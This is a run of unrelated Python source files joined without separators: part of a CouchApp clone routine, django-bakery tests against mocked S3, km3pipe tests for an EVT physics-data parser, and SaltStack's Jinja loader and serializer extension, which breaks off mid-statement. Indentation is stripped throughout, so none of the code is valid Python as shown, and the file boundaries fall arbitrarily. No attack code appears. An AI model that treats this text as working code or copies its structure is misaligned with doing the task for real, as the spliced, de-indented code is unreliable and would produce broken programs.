# make sure file dir have been created
filedir = os.path.dirname(filepath)
if not os.path.isdir(filedir):
os.makedirs(filedir)
util.write(filepath, content)
# remove the key from design doc
temp = doc
for key2 in parts:
if key2 == key:
if not temp[key2]:
del temp[key2]
break
temp = temp[key2]
# second pass for missing key or in case
# manifest isn't in app
for key in doc.iterkeys():
if key.startswith('_'):
continue
elif key == 'couchapp':
app_meta = copy.deepcopy(doc['couchapp'])
if 'signatures' in app_meta:
del app_meta['signatures']
if 'manifest' in app_meta:
del app_meta['manifest']
if 'objects' in app_meta:
del app_meta['objects']
if 'length' in app_meta:
del app_meta['length']
if app_meta:
couchapp_file = os.path.join(path, 'couchapp.json')
util.write_json(couchapp_file, app_meta)
elif key == 'views':
vs_dir = os.path.join(path, key)
if not os.path.isdir(vs_dir):
os.makedirs(vs_dir)
for vsname, vs_item in doc[key].iteritems():
vs_item_dir = os.path.join(vs_dir, vsname)
if not os.path.isdir(vs_item_dir):
os.makedirs(vs_item_dir)
for func_name, func in vs_item.iteritems():
filename = os.path.join(vs_item_dir, '%s.js' %
func_name)
util.write(filename, func)
logger.warning("clone view not in manifest: %s" % filename)
elif key in ('shows', 'lists', 'filters', 'updates'):
showpath = os.path.join(path, key)
if not os.path.isdir(showpath):
os.makedirs(showpath)
for func_name, func in doc[key].iteritems():
filename = os.path.join(showpath, '%s.js' %
func_name)
util.write(filename, func)
logger.warning(
"clone show or list not in manifest: %s" % filename)
else:
filedir = os.path.join(path, key)
if os.path.exists(filedir):
continue
else:
logger.warning("clone property not in manifest: %s" % key)
if isinstance(doc[key], (list, tuple,)):
util.write_json(filedir + ".json", doc[key])
elif isinstance(doc[key], dict):
if not os.path.isdir(filedir):
os.makedirs(filedir)
for field, value in doc[key].iteritems():
fieldpath = os.path.join(filedir, field)
if isinstance(value, basestring):
if value.startswith('base64-encoded;'):
value = base64.b64decode(value[15:])
util.write(fieldpath, value)
else:
util.write_json(fieldpath + '.json', value)
else:
value = doc[key]
if not isinstance(value, basestring):
value = str(value)
util.write(filedir, value)
# save id
idfile = os.path.join(path, '_id')
util.write(idfile, doc['_id'])
util.write_json(os.path.join(path, '.couchapprc'), {})
if '_attachments' in doc: # process attachments
attachdir = os.path.join(path, '_attachments')
if not os.path.isdir(attachdir):
os.makedirs(attachdir)
for filename in doc['_attachments'].iterkeys():
if filename.startswith('vendor'):
attach_parts = util.split_path(filename)
vendor_attachdir = os.path.join(path, attach_parts.pop(0),
attach_parts.pop(0), '_attachments')
filepath = os.path.join(vendor_attachdir, *attach_parts)
else:
filepath = os.path.join(attachdir, filename)
filepath = _replace_slash(filepath)
currentdir = os.path.dirname(filepath)
if not os.path.isdir(currentdir):
os.makedirs(currentdir)
if signatures.get(filename) != util.sign(filepath):
resp = db.fetch_attachment(docid, filename)
with open(filepath, 'wb') as f:
for chunk in resp.body_stream():
f.write(chunk)
logger.debug("clone attachment: %s" % filename)
logger.info("%s cloned in %s" % (source, dest))
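
if __name__ == '__main__':
    # Hypothetical usage sketch (URL and directory are made-up examples):
    # fetch "_design/myapp" from a local CouchDB and write its manifest,
    # views and attachments into ./myapp; rev= would pin a specific revision.
    clone("http://127.0.0.1:5984/mydb/_design/myapp", dest="myapp")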
from __future__ import absolute_import
import os
import six
import sys
import boto
import json
import random
from .. import views, feeds
from django.db import models
from .. import static_views
from django.conf import settings
from .. import models as bmodels
from django.http import HttpResponse
from django.core.management import call_command
from django.test import TestCase, RequestFactory
from django.core.management.base import CommandError
from django.contrib.contenttypes.models import ContentType
class MockObject(bmodels.BuildableModel):
detail_views = ['bakery.tests.MockDetailView']
name = models.CharField(max_length=500)
def get_absolute_url(self):
super(MockObject, self).get_absolute_url() # Just for test coverage
return '/%s/' % self.id
class AutoMockObject(bmodels.AutoPublishingBuildableModel):
detail_views = ['bakery.tests.MockDetailView']
name = models.CharField(max_length=500)
is_published = models.BooleanField(default=False)
def get_absolute_url(self):
return '/%s/' % self.id
class MockDetailView(views.BuildableDetailView):
model = MockObject
template_name = 'detailview.html'
class MockRedirectView(views.BuildableRedirectView):
build_path = "detail/badurl.html"
url = "/detail/"
class MockRSSFeed(feeds.BuildableFeed):
link = '/latest.xml'
def items(self):
return MockObject.objects.all()
class JSONResponseMixin(object):
def render_to_response(self, context, **response_kwargs):
return HttpResponse(
self.convert_context_to_json(context),
content_type='application/json',
**response_kwargs
)
def convert_context_to_json(self, context):
return json.dumps(context)
class MockJSONView(JSONResponseMixin, views.BuildableTemplateView):
build_path = 'jsonview.json'
def get_content(self):
return self.get(self.request).content
def get_context_data(self, **kwargs):
return {'hello': 'tests'}
class BakeryTest(TestCase):
def setUp(self):
self.factory = RequestFactory()
for m in [MockObject, AutoMockObject]:
m.objects.create(name=1)
m.objects.create(name=2)
m.objects.create(name=3)
def test_models(self):
for m in [MockObject, AutoMockObject]:
obj = m.objects.all()[0]
obj.build()
obj.unbuild()
obj.get_absolute_url()
def test_template_view(self):
v = views.BuildableTemplateView(
template_name='templateview.html',
build_path='foo.html',
)
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'foo.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
v = views.BuildableTemplateView(
template_name='templateview.html',
build_path='foo/bar.html',
)
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'foo', 'bar.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_list_view(self):
v = views.BuildableListView(
queryset=[1, 2, 3],
template_name='listview.html',
build_path='foo.html',
)
v.build_method
v.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'foo.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
v = views.BuildableListView(
queryset=[1, 2, 3],
template_name='listview.html',
build_path='foo/bar.html',
)
v.build_method
v.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'foo', 'bar.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_detail_view(self):
v = views.BuildableDetailView(
queryset=MockObject.objects.all(),
template_name='detailview.html',
)
v.build_method
v.build_queryset()
for o in MockObject.objects.all():
build_path = os.path.join(
settings.BUILD_DIR,
o.get_absolute_url()[1:],
'index.html',
)
self.assertTrue(os.path.exists(build_path))
v.unbuild_object(o)
def test_redirect_view(self):
v = views.BuildableRedirectView(
build_path="detail/badurl.html",
url="/detail/"
)
v.build_method
v.build()
MockRedirectView().build()
build_path = os.path.join(
settings.BUILD_DIR,
"detail/badurl.html"
)
self.assertTrue(os.path.exists(build_path))
def test_404_view(self):
v = views.Buildable404View()
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, '404.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_json_view(self):
v = MockJSONView()
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'jsonview.json')
self.assertTrue(os.path.exists(build_path))
self.assertEqual(
json.loads(open(build_path, 'rb').read().decode()),
{"hello": "tests"}
)
os.remove(build_path)
def test_rss_feed(self):
f = MockRSSFeed()
f.build_method
f.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'feed.xml')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_build_cmd(self):
call_command("build", **{'skip_media': True, 'verbosity': 3})
call_command("build", **{'skip_static': True, 'verbosity': 3})
call_command("build", **{'skip_static': True, 'skip_media': True})
call_command("build", **{
'skip_static': True,
'skip_media': True,
'verbosity': 3,
})
call_command("build", **{
'skip_static': True,
'skip_media': True,
'build_dir': settings.BUILD_DIR,
})
call_command("build", 'bakery.tests.MockDetailView')
foobar_path = os.path.join(
settings.BUILD_DIR,
'static',
'foo.bar'
)
self.assertTrue(os.path.exists(foobar_path))
self.assertEqual(
open(foobar_path, 'rb').read().strip(),
six.b('Hello tests')
)
robots_path = os.path.join(settings.BUILD_DIR, 'robots.txt')
self.assertTrue(os.path.exists(robots_path))
favicon_path = os.path.join(settings.BUILD_DIR, 'favicon.ico')
self.assertTrue(os.path.exists(favicon_path))
# If the view you attempt to build does not exist,
# the build command should throw a CommandError.
self.assertRaises(
CommandError,
call_command,
'build',
'FooView',
)
def test_unbuild_cmd(self):
call_command("unbuild")
def test_gzipped(self):
with self.settings(BAKERY_GZIP=True):
six.print_("testing gzipped files")
self.test_models()
self.test_template_view()
self.test_list_view()
self.test_detail_view()
self.test_404_view()
self.test_build_cmd()
def test_buildserver_cmd(self):
pass
def test_publish_cmd(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("publish", no_pooling=True, verbosity=3)
local_file_list = []
for (dirpath, dirnames, filenames) in os.walk(
settings.BUILD_DIR):
for fname in filenames:
local_key = os.path.join(
os.path.relpath(dirpath, settings.BUILD_DIR),
fname
)
if local_key.startswith('./'):
local_key = local_key[2:]
local_file_list.append(local_key)
for key in bucket.list():
self.assertIn(key.name, local_file_list)
call_command("unbuild")
os.makedirs(settings.BUILD_DIR)
call_command("publish", no_pooling=True, verbosity=3)
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_unpublish_cmd(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("unpublish", no_pooling=True, verbosity=3)
self.assertFalse(list(key for key in bucket.list()))
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_tasks(self):
from bakery import tasks
obj = AutoMockObject.objects.all()[0]
ct = ContentType.objects.get_for_model(obj)
tasks.publish_object(ct.id, obj.id)
tasks.unpublish_object(ct.id, obj.id)
# Some save overrides tests
obj = AutoMockObject.objects.all()[0]
obj.save(publish=False)
# obj.is_published = True
# obj.save()
obj.delete(unpublish=False)
def test_static_views(self):
static_views.serve(
self.factory.get("/static/robots.txt"),
'robots.txt',
document_root=os.path.join(os.path.dirname(__file__), 'static')
)
def test_cache_control(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
# Set random max-age for various content types
with self.settings(BAKERY_CACHE_CONTROL={
"application/javascript": random.randint(0, 100000),
"text/css": random.randint(0, 100000),
"text/html": random.randint(0, 100000),
}):
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("publish", no_pooling=True, verbosity=3)
for key in bucket:
key = bucket.get_key(key.name)
if key.content_type in settings.BAKERY_CACHE_CONTROL:
# key.cache_control returns string
# with "max-age=" prefix
self.assertIn(
str(settings.BAKERY_CACHE_CONTROL.get(
key.content_type)),
key.cache_control
)
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_batch_unpublish(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
keys = []
for i in range(0, 10000):
k = boto.s3.key.Key(bucket)
k.key = i
k.set_contents_from_string('This is test object %s' % i)
keys.append(k)
call_command("unpublish", no_pooling=True, verbosity=3)
self.assertFalse(list(key for key in bucket.list()))
else:
self.skipTest("Moto doesn't work in Python 3.4")
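
# Note: the tests above rely on a few Django settings; a minimal, purely
# illustrative configuration (values are examples, not part of the suite):
#
#     BUILD_DIR = '/tmp/bakery-build'              # where built pages are written
#     AWS_BUCKET_NAME = 'my-test-bucket'           # used by the moto-backed S3 tests
#     BAKERY_CACHE_CONTROL = {'text/html': 300}    # max-age per content type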
# Filename: test_evt.py
# pylint: disable=locally-disabled,C0111,R0904,C0301,C0103,W0212
from io import StringIO
from os.path import join, dirname
import numpy as np
from km3pipe.testing import TestCase, skip, data_path
from km3pipe.io.evt import EvtPump, EVT_PARSERS
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2016, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
class TestEvtPump(TestCase):
def setUp(self):
self.valid_evt_header = "\n".join(
(
"start_run: 1",
"cut_nu: 0.100E+03 0.100E+09-0.100E+01 0.100E+01",
"spectrum: -1.40",
"physics: gSeaGen 4.1 180126 165142",
"physics: GENIE 2.10.2 180126 165142",
"end_event:",
"start_event: 12 1",
"track_in: 1 -389.951 213.427 516 -0.204562 -0.60399 -0.770293"
+ " 9.092 0 5 40.998",
"hit: 1 44675 1 1170.59 5 2 1 1170.59",
"end_event:",
"start_event: 13 1",
"track_in: 1 272.695 -105.613 516 -0.425451 -0.370522 -0.825654"
+ " 2431.47 0 5 -1380",
"track_in: 2 272.348 -106.292 516 -0.425451 -0.370522 -0.825654"
+ " 24670.7 1.33 5 -1484",
"track_in: 3 279.47 -134.999 516 -0.425451 -0.370522 -0.825654"
+ " 164.586 26.7 5 601.939",
"hit: 1 20140 1 1140.06 5 1 1 1140.06",
"hit: 2 20159 1 1177.14 5 1 1 1177.14",
"hit: 3 20164 1 1178.19 5 1 1 1178.19",
"hit: 4 20170 1 1177.23 5 1 1 1177.23",
"hit: 5 20171 2 1177.25 5 1 2 1177.25",
"end_event:",
"start_event: 14 1",
"track_in: 1 40.256 -639.888 516 0.185998 0.476123 -0.859483"
+ " 10016.1 0 5 -1668",
"hit: 1 33788 1 2202.81 5 1 1 2202.81",
"hit: 2 33801 1 2248.95 5 1 1 2248.95",
"hit: 3 33814 1 2249.2 5 1 1 2249.2",
"end_event:",
)
)
self.no_evt_header = "\n".join(
(
"start_event: 12 1",
"track_in: 1 -389.951 213.427 516 -0.204562 -0.60399 -0.770293"
+ " 9.092 0 5 40.998",
"hit: 1 44675 1 1170.59 5 2 1 1170.59",
"end_event:",
"start_event: 13 1",
"track_in: 1 272.695 -105.613 516 -0.425451 -0.370522 -0.825654"
+ " 2431.47 0 5 -1380",
"track_in: 2 272.348 -106.292 516 -0.425451 -0.370522 -0.825654"
+ " 24670.7 1.33 5 -1484",
"track_in: 3 279.47 -134.999 516 -0.425451 -0.370522 -0.825654"
+ " 164.586 26.7 5 601.939",
"hit: 1 20140 1 1140.06 5 1 1 1140.06",
"hit: 2 20159 1 1177.14 5 1 1 1177.14",
"hit: 3 20164 1 1178.19 5 1 1 1178.19",
"hit: 4 20170 1 1177.23 5 1 1 1177.23",
"hit: 5 20171 2 1177.25 5 1 2 1177.25",
"end_event:",
"start_event: 14 1",
"track_in: 1 40.256 -639.888 516 0.185998 0.476123 -0.859483"
+ " 10016.1 0 5 -1668",
"hit: 1 33788 1 2202.81 5 1 1 2202.81",
"hit: 2 33801 1 2248.95 5 1 1 2248.95",
"hit: 3 33814 1 2249.2 5 1 1 2249.2",
"end_event:",
)
)
self.corrupt_evt_header = "foo"
self.corrupt_line = "\n".join(
("start_event: 1 1", "corrupt line", "end_event:")
)
self.pump = EvtPump(parsers=[])
self.pump.blob_file = StringIO(self.valid_evt_header)
def tearDown(self):
self.pump.blob_file.close()
def test_parse_header(self):
raw_header = self.pump.extract_header()
self.assertEqual([["1"]], raw_header["start_run"])
self.assertAlmostEqual(-1.4, float(raw_header["spectrum"][0][0]))
self.assertAlmostEqual(1, float(raw_header["cut_nu"][0][2]))
def test_header_entries_with_same_tag_are_put_in_lists(self):
raw_header = self.pump.extract_header()
self.assertAlmostEqual(2, len(raw_header["physics"]))
self.assertAlmostEqual(1, len(raw_header["spectrum"]))
assert "gSeaGen" == raw_header["physics"][0][0]
assert "GENIE" == raw_header["physics"][1][0]
# def test_incomplete_header_raises_value_error(self):
# temp_file = StringIO(self.corrupt_evt_header)
# pump = EvtPump()
# pump.blob_file = temp_file
# with self.assertRaises(ValueError):
# pump.extract_header()
# temp_file.close()
def test_record_offset_saves_correct_offset(self):
self.pump.blob_file = StringIO("a" * 42)
offsets = [1, 4, 9, 12, 23]
for offset in offsets:
self.pump.blob_file.seek(0, 0)
self.pump.blob_file.seek(offset, 0)
self.pump._record_offset()
self.assertListEqual(offsets, self.pump.event_offsets)
def test_event_offset_is_at_first_event_after_parsing_header(self):
self.pump.extract_header()
self.assertEqual(161, self.pump.event_offsets[0])
def test_rebuild_offsets(self):
self.pump.extract_header()
self.pump._cache_offsets()
self.assertListEqual([161, 306, 773], self.pump.event_offsets)
def test_rebuild_offsets_without_header(self):
self.pump.blob_file = StringIO(self.no_evt_header)
self.pump.extract_header()
self.pump._cache_offsets()
self.assertListEqual([0, 145, 612], self.pump.event_offsets)
def test_cache_enabled_triggers_rebuild_offsets(self):
self.pump.cache_enabled = True
self.pump.prepare_blobs()
self.assertEqual(3, len(self.pump.event_offsets))
def test_cache_disabled_doesnt_trigger_cache_offsets(self):
self.pump.cache_enabled = False
self.pump.prepare_blobs()
self.assertEqual(1, len(self.pump.event_offsets))
def test_get_blob_triggers_cache_offsets_if_cache_disabled(self):
"...and asking for not indexed event"
self.pump.cache_enabled = False
self.pump.prepare_blobs()
self.assertEqual(1, len(self.pump.event_offsets))
blob = self.pump.get_blob(2)
self.assertTupleEqual((14, 1), blob["start_event"])
self.assertEqual(3, len(self.pump.event_offsets))
def test_get_blob_raises_index_error_for_wrong_index(self):
self.pump.prepare_blobs()
with self.assertRaises(IndexError):
self.pump.get_blob(23)
def test_get_blob_returns_correct_event_information(self):
self.pump.prepare_blobs()
blob = self.pump.get_blob(0)
self.assertTrue("raw_header" in blob)
self.assertEqual([["1"]], blob["raw_header"]["start_run"])
self.assertTupleEqual((12, 1), blob["start_event"])
# TODO: all the other stuff like hit, track etc.
assert "hit" in blob
assert "track_in" in blob
assert np.allclose(
[[1.0, 44675.0, 1.0, 1170.59, 5.0, 2.0, 1.0, 1170.59]], blob["hit"]
)
blob = self.pump.get_blob(1)
assert 5 == len(blob["hit"])
assert np.allclose(
[3.0, 20164.0, 1.0, 1178.19, 5.0, 1.0, 1.0, 1178.19], blob["hit"][2]
)
def test_get_blob_returns_correct_events(self):
self.pump.prepare_blobs()
blob = self.pump.get_blob(0)
self.assertTupleEqual((12, 1), blob["start_event"])
blob = self.pump.get_blob(2)
self.assertTupleEqual((14, 1), blob["start_event"])
blob = self.pump.get_blob(1)
self.assertTupleEqual((13, 1), blob["start_event"])
def test_process_returns_correct_blobs(self):
self.pump.prepare_blobs()
blob = self.pump.process()
self.assertTupleEqual((12, 1), blob["start_event"])
blob = self.pump.process()
self.assertTupleEqual((13, 1), blob["start_event"])
blob = self.pump.process()
self.assertTupleEqual((14, 1), blob["start_event"])
def test_process_raises_stop_iteration_if_eof_reached(self):
self.pump.prepare_blobs()
self.pump.process()
self.pump.process()
self.pump.process()
with self.assertRaises(StopIteration):
self.pump.process()
def test_pump_acts_as_iterator(self):
self.pump.prepare_blobs()
event_numbers = []
for blob in self.pump:
event_numbers.append(blob["start_event"][0])
self.assertListEqual([12, 13, 14], event_numbers)
def test_pump_has_len(self):
self.pump.prepare_blobs()
self.assertEqual(3, len(self.pump))
def test_pump_get_item_returns_first_for_index_zero(self):
self.pump.prepare_blobs()
first_blob = self.pump[0]
self.assertEqual(12, first_blob["start_event"][0])
def test_pump_get_item_returns_correct_blob_for_index(self):
self.pump.prepare_blobs()
blob = self.pump[1]
self.assertEqual(13, blob["start_event"][0])
def test_pump_slice_generator(self):
self.pump.prepare_blobs()
blobs = self.pump[:]
blobs = list(self.pump[1:3])
self.assertEqual(2, len(blobs))
self.assertEqual((13, 1), blobs[0]["start_event"])
def test_create_blob_entry_for_line_ignores_corrupt_line(self):
self.pump.blob_file = StringIO(self.corrupt_line)
self.pump.extract_header()
self.pump.prepare_blobs()
self.pump.get_blob(0)
def test_parsers_are_ignored_if_not_valid(self):
self.pump = EvtPump(parsers=["a", "b"])
self.pump.blob_file = StringIO(self.valid_evt_header)
assert "a" not in self.pump.parsers
assert "b" not in self.pump.parsers
def test_parsers_are_added(self):
self.pump = EvtPump(parsers=["km3sim"])
self.pump.blob_file = StringIO(self.valid_evt_header)
assert EVT_PARSERS["km3sim"] in self.pump.parsers
def test_custom_parser(self):
def a_parser(blob):
blob["foo"] = 23
self.pump = EvtPump(parsers=[a_parser])
self.pump.blob_file = StringIO(self.valid_evt_header)
self.pump.extract_header()
self.pump.prepare_blobs()
blob = self.pump[0]
assert 23 == blob["foo"]
def test_auto_parser_finds_all_physics_parsers(self):
self.pump = EvtPump(parsers="auto")
self.pump.blob_file = StringIO(self.valid_evt_header)
self.pump.extract_header()
assert EVT_PARSERS["gseagen"] in self.pump.parsers
class TestEvtFilePump(TestCase):
def setUp(self):
self.fname = data_path("evt/example_numuNC.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname)
next(pump)
pump.finish()
class TestCorsika(TestCase):
def setUp(self):
self.fname = data_path("evt/example_corant_propa.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname)
next(pump)
pump.finish()
class TestPropa(TestCase):
def setUp(self):
self.fname = data_path("evt/example_corant_propa.evt")
self.fnames = []
for i in [0, 1]:
self.fnames.append(data_path("evt/example_corant_propa.evt"))
def test_pipe(self):
pump = EvtPump(filename=self.fname, parsers=["propa"])
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "track_in" in blob
pump.finish()
def test_filenames(self):
pump = EvtPump(filenames=self.fnames, parsers=["propa"])
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "track_in" in blob
pump.finish()
@skip
def test_auto_parser(self):
pump = EvtPump(filename=self.fname)
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "Muon" in blob
assert "MuonMultiplicity" in blob
assert "Neutrino" in blob
assert "NeutrinoMultiplicity" in blob
assert "Weights" in blob
assert "Primary" in blob
pump.finish()
class TestKM3Sim(TestCase):
def setUp(self):
self.fname = data_path("evt/KM3Sim.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname, parsers=["km3sim"])
assert EVT_PARSERS["km3sim"] in pump.parsers
next(pump)
pump.finish()
def test_hits(self):
pump = EvtPump(filename=self.fname, parsers=["km3sim"])
blob = pump[0]
hits = blob["KM3SimHits"]
assert 4 == len(hits)
assert 195749 == hits[0].pmt_id
def test_neutrino(self):
pump = EvtPump(filename=self.fname, parsers=["gseagen", "km3sim"])
blob = pump[0]
EVT_PARSERS["gseagen"](blob)
neutrino = blob["Neutrinos"][0]
self.assertAlmostEqual(0.10066, neutrino.energy)
class TestParserDetection(TestCase):
def test_parsers_are_automatically_detected(self):
pass
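
# Illustrative (non-test) sketch of the API exercised above, assuming an EVT
# file on disk: EvtPump is iterable and yields blob dicts keyed by the parsed
# tags ("start_event", "hit", "track_in", ...).
#
#     pump = EvtPump(filename="some_file.evt", parsers="auto")
#     for blob in pump:
#         print(blob["start_event"], len(blob.get("hit", [])))
#     pump.finish()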
# -*- coding: utf-8 -*-
'''
Jinja loading utils to enable a more powerful backend for jinja templates
'''
# Import python libs
from os import path
import logging
import json
import pprint
from functools import wraps
# Import third party libs
from jinja2 import BaseLoader, Markup, TemplateNotFound, nodes
from jinja2.environment import TemplateModule
from jinja2.ext import Extension
from jinja2.exceptions import TemplateRuntimeError
import yaml
# Import salt libs
import salt
import salt.fileclient
from salt.utils.odict import OrderedDict
from salt._compat import string_types
log = logging.getLogger(__name__)
__all__ = [
'SaltCacheLoader',
'SerializerExtension'
]
# To dump OrderedDict objects as regular dicts. Used by the yaml
# template filter.
class OrderedDictDumper(yaml.Dumper):
pass
yaml.add_representer(OrderedDict,
yaml.representer.SafeRepresenter.represent_dict,
Dumper=OrderedDictDumper)
class SaltCacheLoader(BaseLoader):
'''
A special jinja Template Loader for salt.
Requested templates are always fetched from the server
to guarantee that the file is up to date.
Templates are cached like regular salt states
and only loaded once per loader instance.
'''
def __init__(self, opts, env='base', encoding='utf-8'):
self.opts = opts
self.env = env
self.encoding = encoding
if opts.get('file_client', 'remote') == 'local':
self.searchpath = opts['file_roots'][env]
else:
self.searchpath = [path.join(opts['cachedir'], 'files', env)]
log.debug('Jinja search path: \'{0}\''.format(self.searchpath))
self._file_client = None
self.cached = []
def file_client(self):
'''
Return a file client. Instantiates on first call.
'''
if not self._file_client:
self._file_client = salt.fileclient.get_file_client(self.opts)
return self._file_client
def cache_file(self, template):
'''
Cache a file from the salt master
'''
saltpath = path.join('salt://', template)
self.file_client().get_file(saltpath, '', True, self.env)
def check_cache(self, template):
'''
Cache a file only once
'''
if template not in self.cached:
self.cache_file(template)
self.cached.append(template)
def get_source(self, environment, template):
# checks for relative '..' paths
if '..' in template:
log.warning(
'Discarded template path \'{0}\', relative paths are '
'prohibited'.format(template)
)
raise TemplateNotFound(template)
self.check_cache(template)
for spath in self.searchpath:
filepath = path.join(spath, template)
try:
with salt.utils.fopen(filepath, 'rb') as ifile:
contents = ifile.read().decode(self.encoding)
mtime = path.getmtime(filepath)
def uptodate():
try:
return path.getmtime(filepath) == mtime
except OSError:
return False
return contents, filepath, uptodate
except IOError:
# there is no file under current path
continue
# there is no template file within searchpaths
raise TemplateNotFound(template)
class PrintableDict(OrderedDict):
'''
Ensures that dict str() and repr() are YAML friendly.
.. code-block:: python
mapping = OrderedDict([('a', 'b'), ('c', None)])
print mapping
# OrderedDict([('a', 'b'), ('c', None)])
decorated = PrintableDict(mapping)
print decorated
# {'a': 'b', 'c': None}
'''
def __str__(self):
output = []
for key, value in self.items():
if isinstance(value, string_types):
# keeps quotes around strings
output.append('{0!r}: {1!r}'.format(key, value))
else:
# let default output
output.append('{0!r}: {1!s}'.format(key, value))
return '{' + ', '.join(output) + '}'
def __repr__(self): # pylint: disable=W0221
output = []
for key, value in self.items():
output.append('{0!r}: {1!r}'.format(key, value))
return '{' + ', '.join(output) + '}'
class SerializerExtension(Extension, object):
'''
Yaml and Json manipulation.
Format filters
~~~~~~~~~~~~~~
Allows any data structure to be serialized to JSON or YAML. For example, this dataset:
.. code-block:: python
data = {
'foo': True,
'bar': 42,
'baz': [1, 2, 3],
'qux': 2.0
}
.. code-block:: jinja
yaml = {{ data|yaml }}
json = {{ data|json }}
python = {{ data|python }}
will be rendered as::
yaml = {bar: 42, baz: [1, 2, 3], foo: true, qux: 2.0}
json = {"baz": [1, 2, 3], "foo": true, "bar": 42, "qux": 2.0}
python = {'bar': 42, 'baz': [1, 2, 3], 'foo': True, 'qux': 2.0}
Load filters
~~~~~~~~~~~~
Parse string variables with the selected serializer:
.. code-block:: jinja
{%- set yaml_src = "{foo: it works}"|load_yaml %}
{%- set json_src = '{"bar": "for real"}'|load_json %}
Dude, {{ yaml_src.foo }} {{ json_src.bar }}!
will be rendered as::
Dude, it works for real!
Load tags
~~~~~~~~~
Like the load filters, it parses blocks with the selected serializer
and assigns the result to the relevant variable.
The syntax is {% load_yaml as [VARIABLE] %}[YOUR DATA]{% endload %}
and {% load_json as [VARIABLE] %}[YOUR DATA]{% endload %}
For example:
.. code-block:: jinja
{% load_yaml as yaml_src %}
foo: it works
{% endload %}
{% load_json as json_src %}
{
"bar": "for real"
}
{% endload %}
Dude, {{ yaml_src.foo }} {{ json_src.bar }}!
will be rendered as::
Dude, it works for real!
Import tags
~~~~~~~~~~~
You can also import templates and decode them automatically.
The syntax is {% import_yaml [TEMPLATE_NAME] as [VARIABLE] %}
and {% import_json [TEMPLATE_NAME] as [VARIABLE] %}
.. code-block:: jinja
{% import_yaml "state2.sls" as state2 %}
{% import_json "state3.sls" as state3 %}
Catalog
~~~~~~~
``import_*`` and ``load_*`` tags will automatically expose their
target variable for import. This makes it easy to build catalogs
of data across templates.
For example:
.. code-block:: jinja
# doc1.sls
{% load_yaml as var1 %}
foo: it works
{% endload %}
{% load_yaml as var2 %}
bar: for real
{% endload %}
.. code-block:: jinja
# doc2.sls
{% from "doc1.sls" import var1, var2 as local2 %}
{{ var1.foo }} {{ local2.bar }}
'''
tags = set(['load_yaml', 'load_json', 'import_yaml', 'import_json'])
def __init__(self, environment):
super(SerializerExtension, self).__init__(environment)
self.environment.filters.update({
'yaml': self.format_yaml,
'json': self.format_json,
'python': self.format_python,
'load_yaml': self.load_yaml,
'load_json': self.load_json
})
if self.environment.finalize is None:
self.environment.finalize = self.finalizer
else:
finalizer = self.environment.finalize
@wraps(finalizer)
def wrapper(data):
return finalizer(self.finalizer(data))
self.environment.finalize = wrapper
def finalizer(self, data):
'''
Ensure that printed mappings are YAML friendly.
'''
def explore(data):
if isinstance(data, (dict, OrderedDict)):
return PrintableDict([(key, explore(value)) for key, value in data.items()])
elif isinstance(data, (list, tuple, set)):
return data.__class__([explore(value) for value in data])
return data
return explore(data)
def format_json(self, value):
return Markup(json.dumps(value, sort_keys=True).strip())
def format_yaml(self, value):
return Markup(yaml.dump(value, default_flow_style=True,
Dumper=OrderedDictDumper).strip())
def format_python(self, value):
return Markup(pprint.pformat(value).strip())
def load_yaml(self, value):
if isinstance(value, TemplateModule):
value = str(value)
try:
return yaml.load(value)
except AttributeError:
raise TemplateRuntimeError(
'Unable to load yaml from {0}'.format(value))
def load_json(self, value):
if isinstance(value, TemplateModule):
value = str(value)
try:
return json.loads(value)
except (ValueError, TypeError, AttributeError):
raise TemplateRuntimeError(
'Unable to load json from {0}'.format(value))
def parse(self, parser):
if parser.stream.current.value == 'import_yaml':
return self.parse_yaml(parser)
elif parser.stream.current.value == 'import_json':
return self.parse_json(parser)
elif parser.stream.current.value in ('load_yaml', 'load_json'):
return self.parse_load(parser)
parser.fail('Unknown format ' + parser.stream.current.value,
parser.stream.current.lineno)
def parse_load(self, parser):
filter_name = parser.stream.current.value
lineno = next(parser.stream).lineno
if filter_name not in self.environment.filters:
parser.fail('Unable to parse {0}'.format(filter_name), lineno)
parser.stream.expect('name:as')
target = parser.parse_assign_target()
macro_name = '_' + parser.free_identifier().name
macro_body = parser.parse_statements(('name:endload',),
drop_needle=True)
return [
nodes.Macro(
macro_name,
